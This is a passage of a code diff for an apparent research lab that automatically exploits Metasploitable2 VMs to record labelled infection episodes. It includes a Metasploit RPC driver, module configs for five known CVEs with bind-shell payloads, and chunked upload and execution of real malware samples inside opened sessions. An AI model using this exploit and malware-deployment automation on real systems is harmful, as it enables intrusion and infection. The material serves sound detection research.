+hkjOPQMBBwNCAASjU+sJ+rLPPtTK5t7MsKa6/WDknumPOgxy7uGwGATkd65cHTjz
+zTH6+0+uJ7LPZFTJoPSB5WVHrEA0veY8AxH5o0UwQzAOBgNVHQ8BAf8EBAMCAQYw
+EgYDVR0TAQH/BAgwBgEB/wIBATAdBgNVHQ4EFgQU8EarYtjVc2EvpYE6OPhDQlYB
+docwCgYIKoZIzj0EAwIDSAAwRQIhANxALV9oKSAC4JEB/w1EctnzMfzLyueBpGoB
+7p5I07LRAiAKQuhNMeTDSK3Qql+IjunH8UPidETNXfyInwMnbzgAaQ==
+-----END CERTIFICATE-----
--- a/etc/cis490-bootstrap.service
+++ b/etc/cis490-bootstrap.service
@ -0,0 +1,44 @@
+[Unit]
+Description=CIS490 mTLS bootstrap endpoint (auto-issue client certs to enrolled lab hosts)
+Documentation=https://maxgit.wg/spectral/CIS490
+After=network-online.target
+Wants=network-online.target
+
+[Service]
+Type=simple
+# Runs as root because the wg-pki CA private key is root-only. The
+# service shells out to issue-cis490-client-cert.sh per mint and
+# never touches anything else under /var/lib.
+User=root
+Group=root
+WorkingDirectory=/opt/cis490
+ExecStart=/opt/cis490/.venv/bin/python -m bootstrap \
+    --listen-host 127.0.0.1 \
+    --listen-port 8446 \
+    --issuer-script /opt/wg-pki/scripts/issue-cis490-client-cert-wrapper.sh \
+    --issued-root /var/lib/wg-pki/issued
+Restart=on-failure
+RestartSec=5
+
+# Hardening — narrower than receiver because this binary's only job
+# is to call openssl + tar via the issuer script, then serve files.
+NoNewPrivileges=true
+PrivateTmp=true
+ProtectSystem=strict
+# /home/max/.env/wg-pki/scripts/ holds the issuer script the wrapper
+# exec's. ProtectHome={read-only,tmpfs} both *hide* /home contents
+# instead of restricting them to read-only — so we leave /home
+# accessible. ProtectSystem=strict still keeps everything outside
+# /var/lib/wg-pki write-protected.
+ProtectHome=no
+ReadWritePaths=/var/lib/wg-pki
+ProtectKernelTunables=true
+ProtectKernelModules=true
+ProtectControlGroups=true
+LockPersonality=true
+RestrictNamespaces=true
+RestrictRealtime=true
+SystemCallArchitectures=native
+
+[Install]
+WantedBy=multi-user.target
--- a/etc/cis490-orchestrator.service
+++ b/etc/cis490-orchestrator.service
@ -1,33 +1,46 @@
 [Unit]
-Description=CIS490 episode campaign runner
+Description=CIS490 lab-host episode orchestrator (fleet mode)
 Documentation=https://maxgit.wg/spectral/CIS490
-After=network-online.target
+# Episodes need KVM. msfrpcd (for Tier 3+) is brought up out-of-band
+# by cis490-msfrpcd.service when installed.
+After=network-online.target wg-quick@wg0.service
 Wants=network-online.target

 [Service]
 Type=simple
 User=cis490
 Group=cis490
-SupplementaryGroups=kvm
 WorkingDirectory=/opt/cis490
-ExecStart=/opt/cis490/.venv/bin/python tools/run_campaign.py \
+# /etc/cis490/lab-host.env is written by scripts/install-lab-host.sh;
+# carries FLEET_HOST_ID, BRIDGE, and any operator-supplied overrides.
+EnvironmentFile=/etc/cis490/lab-host.env
+# Fleet mode: detect host capacity, run that many concurrent episodes
+# per wave with samples drawn from the manifest. Each invocation runs
+# one wave and exits; systemd respawns per Restart= below, giving us
+# a continuous stream of fresh-sample episodes per host. The shipper
+# picks them up as `done.marker` files appear.
+ExecStart=/opt/cis490/.venv/bin/python /opt/cis490/tools/run_fleet.py \
    --data-root /var/lib/cis490/data \
-    --target 100
-Restart=on-failure
-RestartSec=10
+    --manifest /opt/cis490/samples/manifest.toml \
+    --waves 1
+Restart=always
+RestartSec=15

-# Hardening
-NoNewPrivileges=true
-PrivateTmp=false
+# Hardening — explicitly grant CAP_NET_RAW for tcpdump (source 4) and
+# CAP_SYS_ADMIN / CAP_PERFMON for perf (source 3) when the operator
+# enables those. Both are inherited by per-episode subprocesses.
+# NoNewPrivileges=false is required because AmbientCapabilities only
+# survives across exec() if NNP is off.
+NoNewPrivileges=false
+PrivateTmp=true
 ProtectSystem=strict
 ProtectHome=true
-ReadWritePaths=/var/lib/cis490 /tmp/cis490-vm /dev/kvm
-ProtectKernelTunables=true
-ProtectKernelModules=true
-ProtectControlGroups=true
-LockPersonality=true
-RestrictRealtime=true
-SystemCallArchitectures=native
+# /tmp is needed for per-slot RUN_DIR (cis490-vm-fleet-<slot>) — the
+# fleet runner stages QEMU's sockets + pidfile there.
+ReadWritePaths=/var/lib/cis490 /tmp
+SupplementaryGroups=kvm
+AmbientCapabilities=CAP_NET_RAW CAP_NET_ADMIN CAP_SYS_ADMIN CAP_PERFMON
+CapabilityBoundingSet=CAP_NET_RAW CAP_NET_ADMIN CAP_SYS_ADMIN CAP_PERFMON CAP_DAC_READ_SEARCH

 [Install]
 WantedBy=multi-user.target
--- a/etc/cis490-shipper.service
+++ b/etc/cis490-shipper.service
@ -1,23 +1,19 @@
 [Unit]
-Description=CIS490 episode shipper
+Description=CIS490 lab-host episode shipper
 Documentation=https://maxgit.wg/spectral/CIS490
-After=network-online.target cis490-orchestrator.service
+# WG must be up before the shipper can reach the receiver.
+After=network-online.target wg-quick@wg0.service
 Wants=network-online.target
+Requires=wg-quick@wg0.service

 [Service]
 Type=simple
 User=cis490
 Group=cis490
 WorkingDirectory=/opt/cis490
-ExecStart=/opt/cis490/.venv/bin/python tools/shipper.py \
-    --data-root /var/lib/cis490/data \
-    --receiver-url https://collector.wg \
-    --host-id lab-host-1 \
-    --ca-bundle /etc/cis490/certs/wg-ca.pem \
-    --client-cert /etc/cis490/certs/lab-host-1.pem \
-    --client-key /etc/cis490/certs/lab-host-1.key
+ExecStart=/opt/cis490/.venv/bin/python -m shipper --config /etc/cis490/lab-host.toml
 Restart=on-failure
-RestartSec=10
+RestartSec=5

 # Hardening
 NoNewPrivileges=true
@ -29,6 +25,7 @@ ProtectKernelTunables=true
 ProtectKernelModules=true
 ProtectControlGroups=true
 LockPersonality=true
+RestrictNamespaces=true
 RestrictRealtime=true
 SystemCallArchitectures=native

--- a/etc/lab-host.toml.example
+++ b/etc/lab-host.toml.example
@ -0,0 +1,50 @@
+# CIS490 lab-host — copy to /etc/cis490/lab-host.toml and edit.
+#
+# This config drives BOTH the orchestrator (which runs episodes) and
+# the shipper (which uploads completed episodes to the central
+# receiver over WG).
+
+# Stable identity for this lab host. Used in the receiver path
+# (/v1/episodes/<host_id>/...) and in the X-Lab-Host header. Pick
+# something short, stable, and DNS-safe — letters, digits, _.- only.
+host_id = "REPLACE_ME"
+
+[paths]
+data_root = "/var/lib/cis490/data"
+samples_store = "/var/lib/cis490/samples/store"
+qcow_image = "/var/lib/cis490/vm/images/metasploitable2.qcow2"
+
+[receiver]
+# The receiver lives behind Caddy on the WG-side collector host. The
+# hostname must resolve over WG (collector.wg in the canonical
+# spectral lab). The wg-pki CA must be on every lab-host so the
+# Caddy-issued internal cert validates.
+url = "https://collector.wg"
+ca_bundle = "/etc/cis490/certs/wg-ca.pem"
+
+# mTLS: leaf cert + private key issued by wg-pki for THIS host_id.
+# Comment these out to fall back to bearer-token auth during early
+# bring-up.
+client_cert = "/etc/cis490/certs/lab-host.pem"
+client_key  = "/etc/cis490/certs/lab-host.key"
+
+# Bearer is optional and only used if mTLS isn't yet configured. When
+# both are set, mTLS does the actual authn and the bearer is a
+# belt-and-suspenders check.
+# bearer_token = "REPLACE_ME_WITH_SECRET"
+
+# Set to false ONLY for local-loopback dev against an unsigned cert.
+# verify_tls = true
+
+[shipper]
+scan_interval_s = 5.0
+request_timeout_s = 60.0
+
+[episode]
+baseline_seconds = 30
+infected_seconds = 90
+dormant_seconds = 60
+
+[retention]
+keep_local_for_days = 7
+prune_at_disk_pct = 80
--- a/etc/receiver.toml.example
+++ b/etc/receiver.toml.example
@ -1,6 +1,6 @@
 # CIS490 receiver — copy to /etc/cis490/receiver.toml and edit.

-listen_addr = "127.0.0.1:8443"
+listen_addr = "127.0.0.1:8444"
 store_root = "/var/lib/cis490/episodes"
 incoming_root = "/var/lib/cis490/incoming"
 index_path = "/var/lib/cis490/index.jsonl"
--- a/exploits/README.md
+++ b/exploits/README.md
@ -1,12 +1,92 @@
 # exploits/

-Metasploit resource scripts (`*.rc`) that drive specific exploit modules
-deterministically — same inputs, same module options, every time.
+The Tier-3 exploit driver — fires a Metasploit module against a
+vulnerable target VM, watches for the resulting session, and stamps the
+session-open transition into the episode's `events.jsonl` so the
+labeler can mark `armed → infecting` honestly.

-Each script:
- Sets `RHOSTS` to the guest's bridge IP.
- Sets a payload that opens a session usable for sample upload + execute.
- Avoids any options that introduce randomness in the exploit fire timing
-  (so that the `armed → infecting` transition lands at a predictable offset).
+## Layout

-These scripts pair with public Metasploit modules. We do not author exploits.
+```
+exploits/
+  msfrpc.py           tiny msgpack-over-HTTPS client for msfrpcd
+  driver.py           MSFExploitDriver — plugged in as EpisodeRunner.on_phase
+  modules.py          ModuleConfig + TOML loader
+  modules/
+    vsftpd_234_backdoor.toml   first canned module (Metasploitable2)
+    ...
+```
+
+## Module configs
+
+Each `modules/*.toml` describes one Metasploit module — its path, the
+options to set, and the payload to use. The driver reads these files
+to drive `module.execute` over msfrpc.
+
+```toml
+description = "..."
+[module]
+type = "exploit"                      # exploit | auxiliary | post
+path = "unix/ftp/vsftpd_234_backdoor"
+
+[module.options]
+RHOSTS = "{{ target_ip }}"            # placeholder substituted at runtime
+RPORT = 21
+
+[payload]
+path = "cmd/unix/interact"
+[payload.options]                     # optional
+# LHOST = "{{ target_ip }}"
+
+[session]
+type = "shell"
+```
+
+The only placeholder supported today is `{{ target_ip }}`. Add more in
+`exploits/modules.py::ModuleConfig.render_options` when needed.
+
+## Running
+
+```sh
+# 1. Start msfrpcd locally:
+msfrpcd -P <password> -U msf -a 127.0.0.1 -p 55553
+
+# 2. Drop a vulnerable target image at vm/images/<name>.qcow2 (e.g.
+#    Metasploitable2 — see docs/sources.md for sha256).
+
+# 3. Drive an episode:
+MSFRPC_PASSWORD=<password> uv run python tools/run_tier3_demo.py \
+    --module vsftpd_234_backdoor \
+    --target-port 21 \
+    --data-root data
+```
+
+The episode's `events.jsonl` will contain:
+
+```
+driver_setup        — module + target snapshotted before fire
+exploit_fire        — module.execute issued
+session_open        — new session id observed in session.list
+session_landing_probe — first command response (id) recorded
+sample_executed     — workload kicked off inside the session
+session_dormant     — workload killed
+session_killed      — session.stop at episode end
+```
+
+These pair with the standard phase labels in `labels.jsonl` so a
+downstream loader can reconcile "what the orchestrator scheduled"
+against "what actually happened on the wire".
+
+## Adding a module
+
+1. Drop a TOML at `exploits/modules/<name>.toml` per the schema above.
+2. Pick a payload that works without a callback channel until the
+   `br-malware` bridge is in (see `vm/launch_target.sh` — SLIRP +
+   `restrict=on` blocks reverse-tcp by design). `cmd/unix/interact`
+   and other "session on the same socket" payloads are safe.
+3. Drive a quick check: `uv run python tools/run_tier3_demo.py --module <name>`.
+4. The new module is automatically picked up by `tools/run_tier3_demo.py`
+   via `--module <name>`; no driver code changes needed.
+
+We do **not** author exploits or modify upstream Metasploit code. The
+driver is a pure adapter from the project's phase machine to msfrpc.
--- a/exploits/init.py
+++ b/exploits/init.py
--- a/exploits/driver.py
+++ b/exploits/driver.py
@ -0,0 +1,338 @@
+"""Tier-3 exploit driver.
+
+Plugged into ``EpisodeRunner`` as the ``on_phase`` callback. Translates
+the closed phase enum into msfrpc actions:
+
+  clean             — idle. (no-op; exploit hasn't fired yet)
+  armed             — module loaded + options applied; module fires
+                      with ``module.execute``. Driver records the fire
+                      timestamp via ``emit_event`` so the labeler can
+                      align ``armed`` with what's actually happening.
+  infecting         — poll for a new session; on session_open, run a
+                      one-shot landing command (``id`` or similar) so
+                      we have a clear "session is responsive" event.
+  infected_running  — start observable workload inside the session.
+  dormant           — kill the workload, leave the session alive.
+  reverting         — kill session, snapshot revert handled by caller.
+
+The events the driver writes match the schema in ``docs/data-model.md``:
+``exploit_fire``, ``session_open``, ``sample_executed``, ``session_dormant``,
+``session_killed``.
+
+The driver does NOT author exploits or pick payloads at runtime — those
+choices live in ``exploits/modules/*.toml``. The driver is a pure
+adapter between the phase machine and msfrpc.
+"""
+
+from __future__ import annotations
+
+import logging
+import time
+from dataclasses import dataclass
+from typing import Callable
+
+from pathlib import Path
+
+from samples.manifest import Sample
+
+from .modules import ModuleConfig
+from .msfrpc import MSFRpcClient, wait_for_new_session
+from .workloads import (
+    ChunkedUpload, Workload, chunked_real_binary_upload,
+    real_binary_workload, workload_for,
+)
+
+
+log = logging.getLogger("cis490.exploits.driver")
+
+EmitEvent = Callable[..., None]
+
+
+@dataclass
+class DriverConfig:
+    target_ip: str
+    session_open_timeout_s: float = 30.0
+    # Driver v1 fallback workload — used only when no Sample is passed
+    # in (Sample-driven runs override these via exploits.workloads).
+    # We keep the v1 path so existing callers keep working unchanged.
+    workload_cmd: str = "yes > /dev/null"
+    workload_kill_cmd: str = "pkill yes; true"
+    # Where staged real-malware binaries live on the lab host.
+    sample_store_root: Path | None = None
+
+
+class MSFExploitDriver:
+    """Phase-to-msfrpc adapter. One instance per episode.
+
+    When constructed with a ``Sample``, the driver dispatches the
+    ``infected_running`` / ``dormant`` workload through
+    ``exploits.workloads`` so the in-session behaviour matches the
+    sample's profile (cpu-saturate, scan-and-dial, io-walk, bursty-c2,
+    low-and-slow, shell-resident). Without a sample, falls back to
+    the v1 single-command workload — useful for the very first
+    Tier-3 smoke runs."""
+
+    def __init__(
+        self,
+        client: MSFRpcClient,
+        module: ModuleConfig,
+        cfg: DriverConfig,
+        emit_event: EmitEvent,
+        *,
+        sample: Sample | None = None,
+    ) -> None:
+        self.client = client
+        self.module = module
+        self.cfg = cfg
+        self.emit = emit_event
+        self.sample = sample
+        # Chunked upload plan (None unless real binary path applies).
+        self._chunked: ChunkedUpload | None = None
+        self.workload: Workload | None = self._resolve_workload(sample)
+
+        self._sessions_seen_at_arm: set[int] = set()
+        self._session_id: int | None = None
+        self._job_id: int | str | None = None
+        self._fired = False
+
+    def _resolve_workload(self, sample: Sample | None) -> Workload | None:
+        """Pick the best workload for this sample:
+          1. real binary (if staged at samples/store/<sha256>) → chunked
+             upload + exec via dedicated dispatch path
+          2. profile mimic from exploits.workloads
+          3. None → driver v1 fallback (yes-loop)
+        """
+        if sample is None:
+            return None
+        if sample.kind == "real" and self.cfg.sample_store_root is not None:
+            bin_path = sample.binary_path(self.cfg.sample_store_root)
+            if bin_path is not None:
+                try:
+                    payload = bin_path.read_bytes()
+                    self._chunked = chunked_real_binary_upload(payload, sample=sample)
+                    # Return a Workload shell so the rest of the driver
+                    # can treat the dispatch uniformly. start_cmd is
+                    # never sent verbatim — _start_workload walks the
+                    # chunked plan instead.
+                    return Workload(
+                        profile=self._chunked.profile,
+                        start_cmd="(chunked-upload-managed-by-driver)",
+                        stop_cmd=self._chunked.stop_cmd,
+                        description=f"Real binary chunked upload+execute "
+                                    f"({len(payload)} bytes, "
+                                    f"{self._chunked.n_chunks} chunks)",
+                    )
+                except OSError as e:
+                    log.warning("could not read real sample %s: %s; falling back", bin_path, e)
+        return workload_for(sample)
+
+    # ---- lifecycle ------------------------------------------------------
+
+    def setup(self) -> None:
+        """Authenticate and snapshot the pre-existing session set so we
+        can recognize a *new* session as the one we just opened."""
+        self.client.login()
+        self._sessions_seen_at_arm = set(self.client.session_list().keys())
+        self.emit(
+            "driver_setup",
+            module=self.module.module_path,
+            payload=self.module.payload_path,
+            target_ip=self.cfg.target_ip,
+            preexisting_sessions=sorted(self._sessions_seen_at_arm),
+            sample=self.sample.name if self.sample else None,
+            sample_kind=self.sample.kind if self.sample else None,
+            sample_sha256=self.sample.sha256 if self.sample else None,
+            workload_profile=self.workload.profile if self.workload else None,
+        )
+
+    def teardown(self) -> None:
+        if self._session_id is not None:
+            try:
+                self.client.session_stop(self._session_id)
+                self.emit("session_killed", session_id=self._session_id)
+            except Exception:
+                log.exception("session.stop on %s", self._session_id)
+        if self._job_id is not None:
+            try:
+                self.client.job_stop(self._job_id)
+            except Exception:
+                log.debug("job.stop on %s (often already gone)", self._job_id)
+        self.client.logout()
+
+    # ---- phase callback -------------------------------------------------
+
+    def set_phase(self, phase: str) -> None:
+        log.info("driver phase -> %s", phase)
+        if phase == "clean":
+            return
+        if phase == "armed":
+            self._fire()
+        elif phase == "infecting":
+            self._await_session()
+        elif phase == "infected_running":
+            self._start_workload()
+        elif phase == "dormant":
+            self._stop_workload()
+        elif phase == "reverting":
+            self.teardown()
+        else:
+            log.warning("unknown phase: %s", phase)
+
+    # ---- actions --------------------------------------------------------
+
+    def _fire(self) -> None:
+        if self._fired:
+            log.debug("module already fired; skipping re-fire")
+            return
+        opts = self.module.render_options(target_ip=self.cfg.target_ip)
+        self.emit(
+            "exploit_fire",
+            module=self.module.module_path,
+            options={k: v for k, v in opts.items() if k != "PASSWORD"},
+        )
+        resp = self.client.module_execute(
+            self.module.module_type, self.module.module_path, opts,
+        )
+        self._job_id = resp.get("job_id")
+        self._fired = True
+
+    def _await_session(self) -> None:
+        if self._session_id is not None:
+            return
+        result = wait_for_new_session(
+            self.client,
+            seen=self._sessions_seen_at_arm,
+            timeout_s=self.cfg.session_open_timeout_s,
+        )
+        if result is None:
+            self.emit(
+                "session_open_timeout",
+                module=self.module.module_path,
+                timeout_s=self.cfg.session_open_timeout_s,
+            )
+            log.warning(
+                "no session opened within %.1fs", self.cfg.session_open_timeout_s,
+            )
+            return
+        sid, info = result
+        self._session_id = sid
+        self.emit(
+            "session_open",
+            session_id=sid,
+            session_type=info.get("type"),
+            tunnel_peer=info.get("tunnel_peer"),
+        )
+        # Landing probe so we have a known-good RTT marker on the wire.
+        try:
+            self.client.session_shell_write(sid, "id")
+            time.sleep(0.5)
+            out = self.client.session_shell_read(sid)
+            self.emit("session_landing_probe", session_id=sid, output=out.strip()[:256])
+        except Exception:
+            log.exception("landing probe on session %s", sid)
+
+    def _start_workload(self) -> None:
+        if self._session_id is None:
+            log.warning("infected_running with no session — skipping workload")
+            return
+        if self._chunked is not None:
+            self._upload_real_binary_chunked()
+            return
+        if self.workload is not None:
+            # Driver v2 — profile-matched mimic workload.
+            self.client.session_shell_write(self._session_id, self.workload.start_cmd)
+            self.emit(
+                "sample_executed",
+                session_id=self._session_id,
+                profile=self.workload.profile,
+                description=self.workload.description,
+                sample=self.sample.name if self.sample else None,
+            )
+        else:
+            # Driver v1 fallback.
+            self.client.session_shell_write(
+                self._session_id,
+                f"nohup sh -c {_shquote(self.cfg.workload_cmd)} </dev/null "
+                f">/dev/null 2>&1 & disown",
+            )
+            self.emit(
+                "sample_executed",
+                session_id=self._session_id,
+                command=self.cfg.workload_cmd,
+            )
+
+    def _upload_real_binary_chunked(self) -> None:
+        """Walk the ChunkedUpload plan: each chunk is a separate
+        shell_write so msfrpc never sees a buffer-busting payload.
+        Verifies the in-guest sha256 before exec; emits per-step
+        events so we have a wire-level audit trail of Tier-4 runs."""
+        plan = self._chunked
+        assert plan is not None and self._session_id is not None
+        sid = self._session_id
+
+        self.emit(
+            "real_binary_upload_begin",
+            session_id=sid,
+            n_chunks=plan.n_chunks,
+            sha256=plan.expected_sha256,
+            sample=self.sample.name if self.sample else None,
+        )
+        for i, chunk in enumerate(plan.chunks):
+            self.client.session_shell_write(sid, chunk)
+            # Read back so the next write doesn't race ahead of the
+            # previous one's prompt return. We don't parse it.
+            try:
+                self.client.session_shell_read(sid)
+            except Exception:
+                pass
+
+        # Decode + verify on the guest side.
+        self.client.session_shell_write(sid, plan.finalize_cmd)
+        try:
+            verify_out = self.client.session_shell_read(sid)
+        except Exception:
+            verify_out = ""
+        verified = "sha-ok" in verify_out
+        self.emit(
+            "real_binary_verify",
+            session_id=sid,
+            ok=verified,
+            output=verify_out.strip()[:256],
+            sha256=plan.expected_sha256,
+        )
+        if not verified:
+            self.emit("real_binary_aborted", session_id=sid, reason="sha mismatch")
+            return
+
+        # Launch.
+        self.client.session_shell_write(sid, plan.exec_cmd)
+        self.emit(
+            "sample_executed",
+            session_id=sid,
+            profile=plan.profile,
+            sample=self.sample.name if self.sample else None,
+            sha256=plan.expected_sha256,
+            kind="real",
+        )
+
+    def _stop_workload(self) -> None:
+        if self._session_id is None:
+            return
+        if self.workload is not None:
+            self.client.session_shell_write(self._session_id, self.workload.stop_cmd)
+        else:
+            self.client.session_shell_write(
+                self._session_id, self.cfg.workload_kill_cmd,
+            )
+        self.emit(
+            "session_dormant",
+            session_id=self._session_id,
+            profile=self.workload.profile if self.workload else None,
+        )
+
+
+def _shquote(s: str) -> str:
+    # Minimal POSIX single-quote escaping. The workload command is set
+    # by us, not by anything user-controlled, so we just need to handle
+    # embedded single quotes correctly for completeness.
+    return "'" + s.replace("'", "'\\''") + "'"
--- a/exploits/modules.py
+++ b/exploits/modules.py
@ -0,0 +1,147 @@
+"""TOML loader for exploit-module configs.
+
+Each ``exploits/modules/*.toml`` describes one Metasploit module — its
+path, the options to set, the payload to use, and how the driver
+should treat the resulting session. The driver consumes ``ModuleConfig``
+objects; the TOML files are the on-disk source of truth.
+
+Why TOML and not msfconsole ``.rc`` scripts? ``.rc`` scripts are
+imperative and assume an interactive console; the driver needs the
+*structured* options to push them through msfrpc. TOML is the simplest
+way to express a small typed map of options — and it round-trips
+cleanly into ``meta.json`` for episode reproducibility.
+
+Per-(host, slot, episode) selection mirrors the sample-manifest
+selector: we want different vulnerabilities exercised across hosts
+and waves so the trained model sees a diverse corpus of
+``armed → infecting`` transition shapes, not just the same FTP
+backdoor every run.
+"""
+
+from __future__ import annotations
+
+import hashlib
+import tomllib
+from dataclasses import dataclass, field
+from pathlib import Path
+from typing import Any
+
+
+_VALID_MODULE_TYPES = {"exploit", "auxiliary", "post"}
+
+
+@dataclass(frozen=True)
+class ModuleConfig:
+    name: str                          # short id, e.g. "vsftpd_234_backdoor"
+    module_type: str                   # "exploit" | "auxiliary" | "post"
+    module_path: str                   # e.g. "unix/ftp/vsftpd_234_backdoor"
+    options: dict[str, Any] = field(default_factory=dict)
+    payload_path: str | None = None    # e.g. "cmd/unix/interact"
+    payload_options: dict[str, Any] = field(default_factory=dict)
+    expected_session_type: str = "shell"  # what we'll get on success
+    description: str = ""
+    # When true the module's payload uses a callback channel (reverse
+    # or bind shell) and won't land a session under SLIRP+restrict=on.
+    # The fleet runner skips these unless BRIDGE is set so episodes
+    # that fire them actually produce data.
+    requires_bridge: bool = False
+
+    def render_options(self, *, target_ip: str) -> dict[str, Any]:
+        """Substitute ``{{ target_ip }}`` placeholders in options.
+
+        Module configs use Jinja-style placeholders for any value that
+        isn't known until episode time (RHOSTS, LHOST, etc.). Today the
+        only supported placeholder is ``target_ip``; if more are needed
+        later, generalize here."""
+        out: dict[str, Any] = {}
+        for k, v in self.options.items():
+            if isinstance(v, str) and "{{" in v:
+                out[k] = (
+                    v.replace("{{ target_ip }}", target_ip)
+                     .replace("{{target_ip}}", target_ip)
+                )
+            else:
+                out[k] = v
+        # MSF requires PAYLOAD as a top-level option even though we
+        # carry it in a separate field on the config.
+        if self.payload_path:
+            out["PAYLOAD"] = self.payload_path
+            for k, v in self.payload_options.items():
+                if isinstance(v, str) and "{{" in v:
+                    v = (
+                        v.replace("{{ target_ip }}", target_ip)
+                         .replace("{{target_ip}}", target_ip)
+                    )
+                out[k] = v
+        return out
+
+
+def load_module_config(path: Path) -> ModuleConfig:
+    raw = tomllib.loads(path.read_text())
+    mod = raw.get("module") or {}
+    module_path = mod.get("path")
+    module_type = mod.get("type", "exploit")
+    if not isinstance(module_path, str) or not module_path:
+        raise ValueError(f"{path}: module.path must be a non-empty string")
+    if module_type not in _VALID_MODULE_TYPES:
+        raise ValueError(
+            f"{path}: module.type {module_type!r} not in {_VALID_MODULE_TYPES}"
+        )
+    options = (raw.get("module", {}).get("options") or {}) | (raw.get("options") or {})
+    payload = raw.get("payload") or {}
+    return ModuleConfig(
+        name=path.stem,
+        module_type=module_type,
+        module_path=module_path,
+        options=dict(options),
+        payload_path=payload.get("path"),
+        payload_options=dict(payload.get("options") or {}),
+        expected_session_type=raw.get("session", {}).get("type", "shell"),
+        description=raw.get("description", ""),
+        requires_bridge=bool(raw.get("runtime", {}).get("requires_bridge", False)),
+    )
+
+
+def load_module_configs(directory: Path) -> dict[str, ModuleConfig]:
+    """Load every ``*.toml`` under ``directory``, keyed by short name."""
+    return {
+        p.stem: load_module_config(p)
+        for p in sorted(directory.glob("*.toml"))
+    }
+
+
+def select_module(
+    catalog: dict[str, ModuleConfig],
+    *,
+    host_id: str,
+    slot: int,
+    episode_index: int,
+) -> ModuleConfig:
+    """Deterministic per-(host, slot, ep) module selector. Mirrors
+    SampleManifest.select() so the entry vector rotates the same way
+    the post-infection workload does. Two hosts hash to different
+    modules at the same slot/episode (collision rate ~1/N); a single
+    host walks the full catalog within ~len(catalog) episodes.
+
+    Inputs reduce to a SHA-256 keyed lookup so runs replay
+    bit-identically given the same (host, slot, ep) tuple."""
+    if not catalog:
+        raise ValueError("module catalog is empty")
+    keys = sorted(catalog.keys())
+    seed = f"module|{host_id}|{slot}|{episode_index}".encode()
+    h = hashlib.sha256(seed).digest()
+    idx = int.from_bytes(h[:8], "big") % len(keys)
+    return catalog[keys[idx]]
+
+
+def module_target_port(module: ModuleConfig) -> int | None:
+    """Pull the RPORT off a module config. Used by the fleet runner
+    to wire the launcher's hostfwd to the right service inside the
+    target VM (vsftpd:21, samba:139, php-cgi:80, distccd:3632,
+    unrealircd:6667)."""
+    rport = module.options.get("RPORT")
+    if isinstance(rport, int):
+        return rport
+    if isinstance(rport, str) and rport.isdigit():
+        return int(rport)
+    return None
--- a/exploits/modules/distccd_command_exec.toml
+++ b/exploits/modules/distccd_command_exec.toml
@ -0,0 +1,36 @@
+description = """
+distccd v1 unauthenticated command execution (CVE-2004-2687). The
+distcc daemon doesn't verify the source of compile jobs, so a
+crafted DCC_CMD-style request runs an arbitrary command as the
+distccd user. Metasploitable2 ships distccd 2.18.3 listening on
+3632. Returns a low-priv shell — paired with a privesc later if
+needed; for envelope work the unprivileged shell is enough.
+"""
+
+[module]
+type = "exploit"
+path = "unix/misc/distcc_exec"
+
+[module.options]
+RHOSTS = "{{ target_ip }}"
+RPORT = 3632
+
+[payload]
+# Bind shell on a fixed in-guest port. The host hostfwds this port
+# (see runtime.extra_target_ports) so msfrpcd can connect to it
+# from the loopback side. Avoids the SLIRP+restrict=on dead-end the
+# reverse_tcp payload hits.
+path = "cmd/unix/bind_perl"
+[payload.options]
+LPORT = 4444
+
+[session]
+type = "shell"
+
+[runtime]
+# Reverse/bind callback path → needs the host-only bridge so the
+# guest can reach the attacker (or the host can reach the bind port
+# beyond SLIRP's restricted forward). Set BRIDGE=br-malware on the
+# lab host to enable.
+requires_bridge = true
+extra_target_ports = [4444]
--- a/exploits/modules/php_cgi_arg_injection.toml
+++ b/exploits/modules/php_cgi_arg_injection.toml
@ -0,0 +1,28 @@
+description = """
+PHP-CGI argument injection (CVE-2012-1823). PHP < 5.3.12 in CGI mode
+treats query-string args as command-line flags, letting a crafted
+?-d allow_url_include=1 turn any PHP page into a remote-code-exec.
+Metasploitable2's Apache + php-cgi setup is vulnerable. Returns a
+shell session on whoever runs Apache.
+"""
+
+[module]
+type = "exploit"
+path = "multi/http/php_cgi_arg_injection"
+
+[module.options]
+RHOSTS = "{{ target_ip }}"
+RPORT = 80
+TARGETURI = "/"
+
+[payload]
+path = "cmd/unix/bind_perl"
+[payload.options]
+LPORT = 4445
+
+[session]
+type = "shell"
+
+[runtime]
+requires_bridge = true
+extra_target_ports = [4445]
--- a/exploits/modules/samba_usermap_script.toml
+++ b/exploits/modules/samba_usermap_script.toml
@ -0,0 +1,21 @@
+description = """
+Samba 3.0.20 username-map command injection (CVE-2007-2447). Trigger
+is a crafted username at SMB authentication; the Samba daemon shells
+out via the username_map_script and runs whatever the attacker put in
+the username. Standard Metasploitable2 vector. Returns a root shell
+on the SMB socket — works with cmd/unix/interact.
+"""
+
+[module]
+type = "exploit"
+path = "multi/samba/usermap_script"
+
+[module.options]
+RHOSTS = "{{ target_ip }}"
+RPORT = 139
+
+[payload]
+path = "cmd/unix/interact"
+
+[session]
+type = "shell"
--- a/exploits/modules/unreal_ircd_3281_backdoor.toml
+++ b/exploits/modules/unreal_ircd_3281_backdoor.toml
@ -0,0 +1,28 @@
+description = """
+UnrealIRCd 3.2.8.1 backdoor (CVE-2010-2075). A modified release
+shipped to the official mirrors carried a backdoor that runs an
+arbitrary command on receipt of a magic AB; payload string. Once
+the backdoor was discovered the official tarball was pulled, but
+Metasploitable2 still ships the trojaned build. Returns a shell on
+the IRC user.
+"""
+
+[module]
+type = "exploit"
+path = "unix/irc/unreal_ircd_3281_backdoor"
+
+[module.options]
+RHOSTS = "{{ target_ip }}"
+RPORT = 6667
+
+[payload]
+path = "cmd/unix/bind_perl"
+[payload.options]
+LPORT = 4446
+
+[session]
+type = "shell"
+
+[runtime]
+requires_bridge = true
+extra_target_ports = [4446]
--- a/exploits/modules/vsftpd_234_backdoor.toml
+++ b/exploits/modules/vsftpd_234_backdoor.toml
@ -0,0 +1,23 @@
+description = """
+vsftpd 2.3.4 intentional backdoor (CVE-2011-2523). Triggered by an FTP
+USER name ending with ':)'. Standard Metasploitable2 exploit, fully
+deterministic — perfect for a Tier-3 first-light run because the
+exploit fire timing is bounded by a single FTP round-trip.
+"""
+
+[module]
+type = "exploit"
+path = "unix/ftp/vsftpd_234_backdoor"
+
+[module.options]
+RHOSTS = "{{ target_ip }}"
+RPORT = 21
+# The exploit returns its own command shell — we drive it with a
+# minimal cmd/unix/interact payload so the session lands as a plain
+# shell session usable by session.shell_write/read.
+
+[payload]
+path = "cmd/unix/interact"
+
+[session]
+type = "shell"
--- a/exploits/msfrpc.py
+++ b/exploits/msfrpc.py
@ -0,0 +1,231 @@
+"""Tiny Metasploit RPC client — just enough for the Tier-3 driver.
+
